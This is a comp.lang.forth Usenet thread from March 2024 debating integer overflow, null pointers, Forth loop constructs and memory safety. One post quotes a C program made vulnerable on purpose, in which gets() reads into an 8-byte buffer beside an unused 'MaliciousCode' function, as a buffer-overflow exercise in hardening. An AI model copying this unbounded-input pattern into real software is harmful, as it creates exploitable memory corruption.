    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    2+2=5 is also deterministic yet wrong.
    In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

    2+2=5 is obviously wrong and Java doesn't go quite that far. Java
    instead insists that you can add two positive integers and get a
    negative one. That's wrong the same way that 2+2=5 is.

    Not at all. Modular arithmetic is not arithmetic in Z, but it's a
    commutative ring and has the nice properties of this algebraic
    structure.

    It just doesn't
    mess up actual programs as often, because the numbers involved are
    bigger.

    If you use members of that ring as if they were members of Z, you will sometimes get an unintended result; but even that works surprisingly
    well, so well that the RISC-V designers have not seen a need to
    include an efficient way to detect those cases where the result
    deviates from that in Z. Still, the nice algebraic properties of
    modular arithmetic can be of benefit even in such cases:

    9223372036854775807 1 + dup cr . 2 - cr .

    prints

    -9223372036854775808
    9223372036854775806 ok

    in Gforth on a 64-bit machine.

    In what world can it be right for n to be a positive integer and n+1 to
    be a negative integer? That's not how integers work.

    It's how Java's int and long types work. And if you want something
    closer to Z, Java also has BigInteger.

    Tony Hoare in 2009 said about null pointers:

    And the relevance is?

    Java-style wraparound
    arithmetic is more of the same. A bug magnet,

    Unsupported claim. Interestingly, I remember only one case where I
    saw an unintended result due to modular arithmetic in a programming
    language. It happened when I computed with performance counter
    results in bash. bash still works that way:

    [~:147654] A=9223372036854775807
    [~:147655] echo $[A+1]
    -9223372036854775808

    I think I saw the unintended result on a 32-bit machine, because
    performance counter results typically do not exceed 2^48, definitely
    not 2^63-1.

    Java also has null pointers, another possible mistake. Ada doesn't have >them,

    Ada certainly has null.

    C++ has them because of its C heritage and
    the need to support legacy code, but I believe that in "modern" C++
    style you're supposed to use references instead of pointers, so you
    can't have a null or uninitialized one.

    I don't know much about C++, but I would be surprised if they had
    given up on uninitialized data. And an uninitialized reference is
    certainly not better than a null reference.

    Null pointers are at least a little bit more on-topic in this thread
    than integer overflow. In Java one can write, say, a linked list or a
    tree in an object-oriented manner, with, e.g., a tree node being an
    abstract class that has two concrete subclasses: inner node, and empty
    node. No null pointers in sight, right? Wrong: When an inner node is
    created, the constructor of the node first sees a data structure where
    all bytes have been initialized to 0, in order to guarantee memory
    safety; for the references to the child nodes, this means that at that
    point they are null pointers. Only then can the Java code in the
    constructor overwrite them with whatever proper value they get. Is it
    a problem? Not if they only exist there.

    The fact that Java idiomatics is to implement trees and linked lists
    not in the object-oriented way I outlined above, but in an imperative
    way with null pointers instead of empty nodes could be more
    problematic, but is it a major problem? Not in my (limited)
    experience.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Anton Ertl on Mon Mar 11 19:20:08 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps

    It worked for me too (in a browser). The Golden Cove figures are
    impressive. I believe there are some RISC-V implementations with OOO by
    now though.

    The article about carry bits is interesting though besides bignums, one
    should also consider the cost of (desirable) routine overflow trapping
    of integer arithmetic which is currently not done much. Maybe
    benchmarking C programs compiled with and without -ftrapv would be a
    useful addition.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Anton Ertl on Mon Mar 11 20:07:01 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    Not at all. Modular arithmetic is not arithmetic in Z, but it's a commutative ring and has the nice properties of this algebraic
    structure.

    Right, those modular values aren't integers, they are equivalence
    classes of integers. The ring Z/NZ might have some nice properties
    but they aren't the properties of integers.

    but even that works surprisingly well, so well that the RISC-V
    designers have not seen a need to include an efficient way to detect
    those cases where the result deviates from that in Z.

    Sure, C worked pretty well in the 1980s but we've seen how well that
    worked out. RISC-V perpetuates the bugs of the 1980s instead of taking
    the opportunity to fix them.

    Still, the nice algebraic properties of modular arithmetic can be of
    benefit even in such cases.... 64 bit machine

    Another thing, if I run the same integer calculation on two machines, at
    least programmed in a HLL, I should expect the same result on both. But
    if the word sizes are different then the results will be different. (If
    one or both crash due to implementation restrictions such as machine
    overflow, that's annoying, but it's better than getting wrong answers).

    In what world can it be right for n to be a positive integer and n+1 to
    be a negative integer? That's not how integers work.
    It's how Java's int and long types work.

    Yes, that's a mistake. I just don't see how it can be anything else.
    2+2=5 would be obviously wrong, but it's hypothetical, or as you say, a
    straw man. 20+20=50 or 2000+2000=5000 or 200000+200000=500000 would
    also be straw men, since they don't happen either. What about 2000000000+2000000000=-294967296? Java actually does that, it can't be
    called a straw man, so instead I'm supposed to believe that it's a valid result. I just can't.

    And if you want something closer to Z, Java also has BigInteger.

    Those are boxed and expensive for the usual case where the results are
    expected to fit into the machine word. Of course that expectation may
    be wrong (say due to a program bug), but in that case I want the program
    to crash, like it would for an out-of-range subscript.

    Maybe it is a mistake for Java to have an int type like that at all,
    i.e. BigInteger should be the default, like in Python. It was a design
    choice to make machine arithmetic more accessible to gain acceptance by
    some potential users. Guy Steele famously said "We were after the C++ programmers. We managed to drag a lot of them about halfway to Lisp."
    Java today seems awfully old-fashioned of course.

    .
    Tony Hoare in 2009 said about null pointers:
    And the relevance is?

    Both are instances where adding a "feature" for implementation
    convenience turned out to attract bugs and vulnerabilities.

    Java-style wraparound arithmetic is more of the same. A bug magnet,
    Unsupported claim.

    It's supported by that page linked a few days ago, about overflow bugs
    in real programs.

    I think I saw the unintended result on a 32-bit machine

    I agree that it's less likely to be a problem if the ints are 64 bits.
    And of course it was a frequent occurence in the 16 bit era.

    Note that at least in gcc on x64, ints and longs by default are still 32
    bits. These days when I write C code I tend to use stdint.h and specify
    int sizes explicitly, e.g. int64_t or int32_t rather than int or long or whatever.

    I don't know much about C++, but I would be surprised if they had
    given up on uninitialized data. And an uninitialized reference is
    certainly not better than a null reference.

    I don't know a way to make an uninitialized reference in C++ but maybe
    it's possible. If you just say "int &y;" you get a compile time error.

    The fact that Java idiomatics is to implement trees and linked lists
    not in the object-oriented way I outlined above

    The OO description is similar to using a sum type, and it's reasonable
    for the implementation under the covers to use a zero pointer to
    represent an empty list. Some Lisp implementations go even further and
    used "cdr coding", which means using a single bit to indicate that the
    next list node is at the next word in memory, so the "next" pointer
    (cdr) can be eliminated. You might allocate the list nodes
    non-consecutively when the list is created, but a compacting GC can
    later make the elements consecutive in memory and get rid of the pointer overhead.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From albert@spenarnc.xs4all.nl@21:1/5 to Anton Ertl on Tue Mar 12 09:48:18 2024
    In article <2024Mar11.220843@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Paul Rubin <no.email@nospam.invalid> writes:
    <SNIP?
    Java also has null pointers, another possible mistake. Ada doesn't have >>them,

    Ada certainly has null.

    C++ has them because of its C heritage and
    the need to support legacy code, but I believe that in "modern" C++
    style you're supposed to use references instead of pointers, so you
    can't have a null or uninitialized one.

    I don't know much about C++, but I would be surprised if they had
    given up on uninitialized data. And an uninitialized reference is
    certainly not better than a null reference.

    I can't see the problem with null pointers. Algol68 had an explicit
    `nil' that serves the same purpose. Any reference is initialized with
    `nil'. If you try to dereference it, meaning trying to fetch or otherwise
    use the referred object this meets with a run time error.
    That is probably the clean and expensive way.
    So nil + reference takes the same place as NULL + pointer in c.

    I try to emulate this in ciforth. Looking up a word in the dictionary
    results in an entry (struct with fields for properties) or a null pointer,
    i.e. zero. You are supposed to test for this case, but if you fail
    you get a "Segmentation fault".
    As far as Forth goes, that is pretty satisfactory security.

    <SNIP>

    - anton

    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From albert@spenarnc.xs4all.nl@21:1/5 to Anton Ertl on Tue Mar 12 10:13:19 2024
    In article <2024Mar2.090401@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    #include <stdio.h>
    #include <stdlib.h>

    void MaliciousCode() {
    printf("This code is malicious!\n");
    printf("It will not execute normally.\n");
    exit(0);
    }

    void GetInput() {
    char buffer[8];
    gets(buffer);
    // puts(buffer);
    }

    int main() {
    GetInput();
    return 0;
    }
    === end code ===

    It will be a useful exercise to work up a similar example in Forth, as a >>step to thinking about automatic hardening techniques (as opposed to
    input sanitization).

    Forth does not have an inherently unbounded input word like C's
    gets(). And even typical C environments warn you when you compile
    this code; e.g., when I compile it on Debian 11, I get:

    gcc xxx.c
    |xxx.c: In function ‘GetInput’:
    |xxx.c:12:10: warning: implicit declaration of function ‘gets’; did
    you mean ‘fgets’? [-Wimplicit-function-declaration]
    | 12 | gets(buffer);
    | | ^~~~
    | | fgets
    |/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
    |xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and
    should not be used.

    So, they removed gets() from stdio.h, and added a warning to the
    linker. "man gets" tells me:

    |_Never use this function_
    |[...]
    |ISO C11 removes the specification of gets() from the C language, and
    |since version 2.16, glibc header files don't expose the function >|declaration if the _ISOC11_SOURCE feature test macro is defined.

    Ironically, in ciforth I implemented (ACCEPT). That has the
    functionality of gets(). However it returns (addr length) and
    identifies a part of the input buffer. So you can never
    overwrite anything, because it doesn't write anything.

    <SNIP>

    - anton

    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Hans Bezemer on Wed Mar 13 07:20:34 2024
    Hans Bezemer <the.beez.speaks@gmail.com> writes:
    In a perfect world I'd have a word:
    - That puts *three* parameters on the stack: limit, start and step;
    - That evaluates these three parameters and leaves a flag
    - That takes this flag and skips the loop if zero.

    Let's call the word that initializes these actions "+DO". +DO equals (
    limit index step -- R: limit index step)

    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )

    which is paired with LOOP. Both produce the same addresses (if ubytes
    is a multiple of +nstride), but MEM-DO in reverse order.

    One could add a BOUNDS+DO that works like your +DO, but I would first
    have to see if it is needed.

    Concerning the name +DO, this is taken in Gforth since at least
    Gforth-0.2 (1996) for entering a loop only if index<limit (signed
    comparison), without providing a stride.

    Compare: https://rosettacode.org/wiki/Loops/Wrong_ranges#uBasic/4tH
    To the rather weak: https://rosettacode.org/wiki/Loops/Wrong_ranges#Forth

    Note that 4tH behaves different here. It catches most of the exceptional >situations:

    start: -2 stop: 2 inc: 1 | -2 -1 0 1
    start: -2 stop: 2 inc: 0 | -2
    start: -2 stop: 2 inc: -1 | -2
    start: -2 stop: 2 inc: 10 | -2
    start: 2 stop: -2 inc: 1 | 2
    start: 2 stop: 2 inc: 1 | 2
    start: 2 stop: 2 inc: -1 | 2
    start: 2 stop: 2 inc: 0 | 2
    start: 0 stop: 0 inc: 0 | 0

    Versus:

    Some of these loop infinitely, and some under/overflow, so for the sake
    of brevity long outputs will be truncated by ....

    start: -2 stop: 2 inc: 1 | -2 -1 0 1
    start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
    start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2
    start: -2 stop: 2 inc: 10 | -2
    start: 2 stop: -2 inc: 1 | 2 3 4 5 ... -6 -5 -4 -3
    start: 2 stop: 2 inc: 1 | 2 3 4 5 ... -2 -1 0 1
    start: 2 stop: 2 inc: -1 | 2
    start: 2 stop: 2 inc: 0 | 2 2 2 2 2 ...
    start: 0 stop: 0 inc: 0 | 0 0 0 0 0 ...

    I still don't think 4tH's performance is perfect, but it's a tradeoff
    between compatibility and intuitive behavior.

    You showed the DO version in Forth, which is indeed rather weak for
    the practically occuring index=limit case. For that we have ?DO,
    which shows:

    start: -2 stop: 2 inc: 1 | -2 -1 0 1
    start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
    start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2
    start: -2 stop: 2 inc: 10 | -2
    start: 2 stop: -2 inc: 1 | 2 3 4 5 ... -6 -5 -4 -3
    start: 2 stop: 2 inc: 1 |
    start: 2 stop: 2 inc: -1 |
    start: 2 stop: 2 inc: 0 |
    start: 0 stop: 0 inc: 0 |

    The 0 +LOOP case (second line) does not occur in practice. I
    recommend to not use

    ?DO ... -1 +LOOP

    because the behaviour of ?DO is not consistent with that of -1 +LOOP
    when index=limit. The rosettacode tests don't show this inconsistency
    clearly, though. Gforth has

    -DO ... 1 -LOOP

    for decrementing in each step by 1, but it seems to me that the
    rosettacode task is intended to use the same counted-loop construct
    for both cases. If you, say, write

    2 -2 +DO ... -1 +LOOP

    You will get the same result as in the third line, but you asked for
    it.

    For the fifth line, if you use

    -2 2 +DO ... 1 +LOOP

    the result is that the loop is not entered.

    Overall, for

    : test-seq ( start stop inc -- )
    cr rot dup ." start: " 2 .r
    rot dup ." stop: " 2 .r
    rot dup ." inc: " 2 .r ." | "
    -rot swap +do i . dup +loop drop ;
    -2 2 1 test-seq
    -2 2 0 test-seq
    -2 2 -1 test-seq
    -2 2 10 test-seq
    2 -2 1 test-seq
    2 2 1 test-seq
    2 2 -1 test-seq
    2 2 0 test-seq
    0 0 0 test-seq

    the output is:

    start: -2 stop: 2 inc: 1 | -2 -1 0 1 ok
    start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
    start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2 ok
    start: -2 stop: 2 inc: 10 | -2 ok
    start: 2 stop: -2 inc: 1 | ok
    start: 2 stop: 2 inc: 1 | ok
    start: 2 stop: 2 inc: -1 | ok
    start: 2 stop: 2 inc: 0 | ok
    start: 0 stop: 0 inc: 0 | ok

    The same as the ?DO variant except for the "start: 2 stop: -2 inc: 1"
    case.

    I don't consider performing one iteration if index=limit good
    behaviour.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From mhx@21:1/5 to Anton Ertl on Wed Mar 13 10:00:05 2024
    Anton Ertl wrote:
    [..]
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )
    [..]

    Interesting! It's always a nuisance when one wants to step backwards.
    Does it work with UNLOOP and does one point at the start of the area
    or at the address of the first item to process?

    -marcel

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Anton Ertl on Wed Mar 13 09:24:36 2024
    Anton Ertl wrote:
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )

    which is paired with LOOP. Both produce the same addresses (if ubytes
    is a multiple of +nstride), but MEM-DO in reverse order.

    A very handy addition when working with arrays. I use similar words

    .. NEXT and <FOR .. NEXT \ index N for 1-dim vectors

    .. NEXT and <<FOR .. NEXT \ indices X Y for 2-dim arrays.

    Recently I also added a "runtime control flow stack" to my system to hold
    loop indices. I just hated UNLOOP et al too much. ;-)

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to dxf on Wed Mar 13 14:15:49 2024
    dxf wrote:

    On 13/03/2024 9:00 pm, mhx wrote:
    Anton Ertl wrote:
    [..]
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )
    [..]

    Interesting! It's always a nuisance when one wants to step backwards.
    Does it work with UNLOOP and does one point at the start of the area or at the address of the first item to process?

    Make one using BEGIN WHILE REPEAT. That's what Forth is for.

    Scratch with the chickens, don't fly with the eagles! ;-)

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to mhx on Wed Mar 13 16:41:37 2024
    mhx@iae.nl (mhx) writes:
    Anton Ertl wrote:
    [..]
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )
    [..]

    Interesting! It's always a nuisance when one wants to step backwards.
    Does it work with UNLOOP

    I used the locals stack for the stride in the general case (when the
    stride is not a constant). If MEM+DO works correctly, that value is
    cleaned up automatically. Let's see if it works correctly:

    : foo pad swap dup mem+do unloop exit loop ;
    : bar 123 {: a :} cell foo a . ;
    bar

    This prints 123, so it works as intended. Let's see if LEAVE also
    works as it should:

    : foo 123 {: a :} pad swap dup mem+do leave loop a . ;
    cell foo

    This also prints 123 as it should.

    and does one point at the start of the area
    or at the address of the first item to process?

    For MEM+DO addr is the first item to process, for MEM-DO the last.
    I.e., you use exactly the same parameters whether you process the
    array forwards with MEM+DO or backwards with MEM-DO, as long as ubytes
    is a multiple of +nstride.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to albert@spenarnc.xs4all.nl on Wed Mar 13 18:03:56 2024
    albert@spenarnc.xs4all.nl writes:
    So [Algol68] nil + reference takes the same place as NULL + pointer in c.

    I'm unfamiliar with Algol68 but if every reference in it can be set to
    nil, that sounds like the same error that Algol-W had. The alternative,
    using an option value, means: 1) if the reference is not wrapped by an
    option type, then it is guaranteed to not be null; 2) if it is wrapped
    by an option type, then the compiler can stop you (or at least warn you)
    if you try to dereference without first checking that it is non-null.

    You are supposed to test for this case, but if you fail you get a "Segmentation fault". As far as Forth goes, that is pretty
    satisfactory security.

    For sure, it is usually better to crash than to keep running and give
    nonsense answers. Of course that usually requires a hardware fault on dereferencing a null pointer, rather than giving whatever is at location
    0 in memory like on unprotected machines.

    Beyond not giving wrong answers, it's usually nice if your program
    doesn't crash too often, especially from program bugs. Getting help
    from the compiler for that is often useful.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From albert@spenarnc.xs4all.nl@21:1/5 to no.email@nospam.invalid on Thu Mar 14 09:16:55 2024
    In article <87bk7h1v5v.fsf@nightsong.com>,
    Paul Rubin <no.email@nospam.invalid> wrote:
    albert@spenarnc.xs4all.nl writes:
    So [Algol68] nil + reference takes the same place as NULL + pointer in c.

    I'm unfamiliar with Algol68 but if every reference in it can be set to
    nil, that sounds like the same error that Algol-W had. The alternative, >using an option value, means: 1) if the reference is not wrapped by an
    option type, then it is guaranteed to not be null; 2) if it is wrapped
    by an option type, then the compiler can stop you (or at least warn you)
    if you try to dereference without first checking that it is non-null.

    You are supposed to test for this case, but if you fail you get a
    "Segmentation fault". As far as Forth goes, that is pretty
    satisfactory security.

    For sure, it is usually better to crash than to keep running and give >nonsense answers. Of course that usually requires a hardware fault on >dereferencing a null pointer, rather than giving whatever is at location
    0 in memory like on unprotected machines.

    Algol68 doesn't crash. It gives a run time error of the type
    dereferencing a <nil> (<ref> <ref> <my_struct> aap) on line .. of ...
    called from line .. of ..
    ..
    called from line .. of main

    Beyond not giving wrong answers, it's usually nice if your program
    doesn't crash too often, especially from program bugs. Getting help
    from the compiler for that is often useful.

    You can't get much help from the compiler for uninitialised references
    like this. Either it crashes in the first run or it is insidious.

    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to albert@spenarnc.xs4all.nl on Thu Mar 14 14:52:43 2024
    albert@spenarnc.xs4all.nl writes:
    Algol68 doesn't crash. It gives a run time error of the type

    Well that's what I mean by crashing. The program is terminated "involuntarily", or alternatively there is some way to catch the exception. Either way, the computation doesn't proceed.

    You can't get much help from the compiler for uninitialised references
    like this. Either it crashes in the first run or it is insidious.

    No idea about Algol68 but in (at least some) other languages, the idea
    of having references instead of pointers is that it is impossible to
    create an uninitialised reference.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Paul Rubin on Fri Mar 15 09:26:11 2024
    Paul Rubin wrote:

    albert@spenarnc.xs4all.nl writes:
    Algol68 doesn't crash. It gives a run time error of the type

    Well that's what I mean by crashing. The program is terminated "involuntarily", or alternatively there is some way to catch the exception. Either way, the computation doesn't proceed.

    You can't get much help from the compiler for uninitialised references
    like this. Either it crashes in the first run or it is insidious.

    No idea about Algol68 but in (at least some) other languages, the idea
    of having references instead of pointers is that it is impossible to
    create an uninitialised reference.

    In Forth parlance: unless you're doing system programming where you need it, don't use direct memory operations like @ ! MOVE, etc. This also prohibits
    the use of VARIABLE. VARIABLES are uninitialized and are accessed by @ !.

    So I regularly use either xVALUEs (x means different data types) or data objects (for compound or dynamic types) with access methods. This results
    in cleaner code and improves memory safety.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to minforth on Fri Mar 15 11:37:55 2024
    minforth@gmx.net (minforth) writes:
    In Forth parlance: unless you're doing system programming where you
    need it, don't use direct memory operations like @ ! MOVE, etc. This
    also prohibits the use of VARIABLE. VARIABLES are uninitialized and
    are accessed by @ !.

    That helps but I'm sure there are other hazards. What do you do about
    arrays? What about ALLOT or ALLOCATE?

    At least in gforth, VARIABLEs are initialized to 0. That seems like a
    good thing for implementations to do ingeneral.

    So I regularly use either xVALUEs (x means different data types) or data objects (for compound or dynamic types) with access methods. This results
    in cleaner code and improves memory safety.

    Yes I should start doing that too. I only mess with Forth for fun
    though. I feel like it helps me stay sharp compared with safer
    languages, even including C. I'm not old enough to have written
    significant amounts of machine code.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Paul Rubin on Fri Mar 15 19:55:07 2024
    Paul Rubin wrote:

    minforth@gmx.net (minforth) writes:
    In Forth parlance: unless you're doing system programming where you
    need it, don't use direct memory operations like @ ! MOVE, etc. This
    also prohibits the use of VARIABLE. VARIABLES are uninitialized and
    are accessed by @ !.

    That helps but I'm sure there are other hazards. What do you do about arrays?

    Arrays are heap-allocated dynamic objects with access methods. Direct memory access is virtually impossible (but with "carnal knowledge"). There
    is an array stack for more complex operations and a chain of array values
    for persistent storage. Stack and array values contain only pointers.

    F.ex.
    XZ14[ designates array (matrix or vector) value XZ14
    <index or indices> ] reads a vector/matrix element
    <index or indices> ]! writes to a vector/matrix element
    M"[ 2 1 ] from 3rd array on array stack read 1st element in 2nd row
    (M[ M'[ M"[ designate top, second and third matrix on array stack)
    XZ14[ ]' pushes transposed matrix XZ14 onto array stack
    XZ14 (or TO XZ14) writes top matrix to array value XZ14
    et cetera

    IOW there is a special word set for array operations. Operators check
    that there is no memory violation like index out of bounds, and do some housekeeping like (re)allocating memory.

    What about ALLOT or ALLOCATE?

    Above word set would be overkill for normal Forth applications.
    Nevertheless you could SEAL your search order and exclude or make
    safer versions of ALLOT et al for your application wordlist.
    I never understood why SEAL did not make it into ANS Forth's
    Search-Order word set, as it is just a simple SET-ORDER thing.

    At least in gforth, VARIABLEs are initialized to 0. That seems like a
    good thing for implementations to do in general.

    Yes and no. It is easy to forget correct initialization when 0 is wrong.
    VALUEs explicitly require conscious initialization.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to dxf on Sat Mar 16 09:35:13 2024
    dxf wrote:
    At least in gforth, VARIABLEs are initialized to 0. That seems like a
    good thing for implementations to do ingeneral.

    That's something I'd do for VALUEs should I move to omit the numeric
    prefix at creation. By automatically initializing VALUEs with 0, I can pretend - if only to myself - that VALUEs are different from VARIABLEs.

    Indeed, if you only work with integers in cell size, VARIABLEs and some
    code discipline are sufficient.

    VALUEs are like variants in VBA. You can only change them with TO <NAME>,
    and TO (alias =>) is the same for all data types. The standard also writes locals and FVALUEs with TO. Non-standard $VALUEs (for dynamic strings) or DVALUEs/ZVALUEs can be very practical too. I also use range-limited VALUEs. None of this works with VARIABLEs.

    When you implement your type-specific TO variants with built-in
    appropriate checking, you are on the safer side.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to minforth on Sat Mar 16 10:20:16 2024
    minforth@gmx.net (minforth) writes:
    Non-standard $VALUEs (for dynamic strings) or
    DVALUEs/ZVALUEs can be very practical too.

    2VALUE is standard.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Anton Ertl on Sat Mar 16 11:13:07 2024
    Anton Ertl wrote:

    minforth@gmx.net (minforth) writes:
    Non-standard $VALUEs (for dynamic strings) or
    DVALUEs/ZVALUEs can be very practical too.

    2VALUE is standard.

    2VALUEs are for cell pairs. DVALUEs do not exist, because
    the standard assumes equivalency of double numbers and cell
    pairs (although mathematically they are not).
    ZVALUEs are for complex numbers.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From mhx@21:1/5 to All on Sun Mar 17 07:30:07 2024
    Interesting. I didn't know that the TO concept was coined by Moore (before Bartholdi).

    -marcel

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Tristan Wibberley@21:1/5 to minforth on Tue Mar 19 19:57:35 2024
    On 05/03/2024 14:03, minforth wrote:
    Tristan Wibberley wrote:


    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    You are still in for some nasty surprises with "public market" ARM CPUs. f.ex.
    https://developer.arm.com/documentation/den0013/d/Porting/Alignment

    And then we're not even trying to talk about what's in use and for sale
    today but rather what will be in use over the next 6 decades. Most of
    the historical peculiarities that are eliminated with more complex
    hardware instead of longer software can be expected to be present at
    some point during that period because more complex hardware is already a difficult problem for information security and I'd expect those
    peculiarities wouldn't have been present if there weren't some
    efficiency earned.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Tristan Wibberley on Tue Mar 19 21:39:41 2024
    Tristan Wibberley wrote:

    On 05/03/2024 14:03, minforth wrote:
    Tristan Wibberley wrote:


    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    You are still in for some nasty surprises with "public market" ARM CPUs.
    f.ex.
    https://developer.arm.com/documentation/den0013/d/Porting/Alignment

    And then we're not even trying to talk about what's in use and for sale
    today but rather what will be in use over the next 6 decades. Most of
    the historical peculiarities that are eliminated with more complex
    hardware instead of longer software can be expected to be present at
    some point during that period because more complex hardware is already a difficult problem for information security and I'd expect those
    peculiarities wouldn't have been present if there weren't some
    efficiency earned.

    Although repeatedly proclaimed dead, we can still observe Moore's Law.
    With the increasing 3-dimensional design of CPUs and the hunger for massive computing power through AI applications, the trend is likely to continue. Another driver is the need for lower energy consumption.

    This means that as the complexity of systems grows almost exponentially,
    the consequences of software errors will become increasingly dangerous in
    the same magnitude. Just as a professional electrician only works with insulated tools, a professional programmer should also choose his tools,
    e.g. programming languages, which do not allow even simple errors to occur
    in the first place. They should also use operating systems and software containers equipped with protective functions.

    These means of protection that already exist today are not available in
    archaic programming languages such as C or Forth. Stoic language
    conservativism (a tenor in standard Forth) won't help.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)